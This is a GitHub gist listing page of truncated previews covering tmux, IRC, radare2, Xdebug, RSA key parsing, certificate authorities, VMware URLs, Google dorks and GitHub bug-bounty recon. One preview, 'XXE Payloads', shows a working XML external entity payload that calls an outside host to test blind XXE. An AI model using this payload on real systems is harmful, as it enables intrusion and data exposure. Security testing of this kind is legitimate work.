Skip to content

Instantly share code, notes, and snippets.

View llamaonsecurity's full-sized avatar

Daniel Kalinowski llamaonsecurity

52 followers · 60 following
View GitHub Profile
@MohamedAlaa
MohamedAlaa / tmux-cheatsheet.markdown
Last active July 3, 2025 16:10
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
@staaldraad
staaldraad / XXE_payloads
Last active June 25, 2025 22:04
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@xero
xero / irc.md
Last active May 25, 2025 14:25
irc cheat sheet
@stevenswafford
stevenswafford / google-dorks
Created June 6, 2015 05:57
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@chadrien
chadrien / README.md
Last active April 22, 2025 15:52
Debug PHP in Docker with PHPStorm and Xdebug

Debug your PHP in Docker with Intellij/PHPStorm and Xdebug

  1. For your local dev, create a Dockerfile that is based on your production image and simply install xdebug into it. Exemple:
FROM php:5

RUN yes | pecl install xdebug \
&amp;&amp; echo "zend_extension=$(find /usr/local/lib/php/extensions/ -name xdebug.so)" &gt; /usr/local/etc/php/conf.d/xdebug.ini \
@williballenthin
williballenthin / yet another radare2 cheatsheet.md
Last active June 16, 2025 16:40

radare2

load without any analysis (file header at offset 0x0): r2 -n /path/to/file

  • analyze all: aa
  • show sections: iS
  • list functions: afl
  • list imports: ii
  • list entrypoints: ie
  • seek to function: s sym.main
@destan
destan / ParseRSAKeys.java
Last active March 31, 2025 23:14
Parse RSA public and private key pair from string in Java
import java.io.IOException;
import java.net.URISyntaxException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.KeyFactory;
import java.security.NoSuchAlgorithmException;
import java.security.PrivateKey;
import java.security.interfaces.RSAPublicKey;
import java.security.spec.InvalidKeySpecException;
import java.security.spec.PKCS8EncodedKeySpec;
@fntlnz
fntlnz / self-signed-certificate-with-custom-ca.md
Last active July 8, 2025 11:45
Self Signed Certificate with Custom Root CA

Create Root CA (Done once)

Create Root Key

Attention: this is the key used to sign the certificate requests, anyone holding this can sign certificates on your behalf. So keep it in a safe place!

openssl genrsa -des3 -out rootCA.key 4096
@ewypych
ewypych / vmware-urls.csv
Created May 6, 2017 10:06
List of some popular VMware tools with theirs urls
Product Version FQDN URL
VMwareESXi 6.0 ESXi /ui
VMwareESXi 6.5 ESXi /ui
VMwareESXi 6.0 ESXi /sdk
VMwareESXi 6.5 ESXi /sdk/vimService.wsdl
vSphereWebClient 5.1 vCenter :9443/vsphere-client
vSphereWebClient 5.5 vCenter :9443/vsphere-client
vSphereWebClient 6.0 vCenter /vsphere-client
vSphereWebClient 6.0 vCenter :9443
vSphereWebClient 6.5 vCenter /vsphere-client
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active July 4, 2025 14:53
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output